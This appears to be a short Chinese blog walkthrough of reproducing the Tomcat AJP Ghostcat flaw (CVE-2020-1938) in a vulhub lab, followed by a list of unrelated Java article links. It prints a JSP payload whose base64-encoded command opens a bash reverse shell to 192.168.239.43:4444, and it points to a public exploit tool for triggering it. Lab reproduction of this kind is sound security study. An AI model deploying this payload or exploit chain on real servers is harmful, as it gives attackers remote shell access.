vulhub中Aapache Tomcat AJP 文件包含漏洞复现(CVE-2020-1938)

查看tomcat默认页面,此时通过AJP协议的8009端口亦可访问Tomcat。

利用如下工具均可测试漏洞:

工具需要用到python2,

如果需要进一步利用需要向服务器的/webapps/ROOT目录下上传恶意文件

复制代码
<%Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS40My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}");%>

利用工具https://github.com/00theway/Ghostcat-CNVD-2020-10487

进行执行上传的恶意文件

相关推荐
what丶k2 分钟前
深入理解Java NIO:从原理到实战的全方位解析
java·开发语言·nio
血小板要健康5 分钟前
笔试面经2(上)(纸质版)
java·开发语言
忧郁的Mr.Li12 分钟前
JVM-类加载子系统、运行时数据区 详解
java·jvm
shehuiyuelaiyuehao17 分钟前
12异常知识点
java
好好研究18 分钟前
MobaXterm远程连接云服务器(Centos环境)及配置jdk、Tomcat、MySQL环境
java·服务器·mysql·jdk·tomcat·aliyun服务器
让我上个超影吧22 分钟前
SpringAI会话记忆实现——基于MYSQL进行存储
java·spring boot·ai
m0_7482331730 分钟前
Laravel vs ThinkPHP:谁更适合你?
java·开发语言
henujolly31 分钟前
How do you troubleshoot a CI failure?
java·开发语言·ci/cd
菜鸟xiaowang33 分钟前
lunch 不显示构建列表
java
草莓熊Lotso34 分钟前
Qt 显示与输入类控件进阶:数字、进度、输入框实战攻略
java·大数据·开发语言·c++·人工智能·qt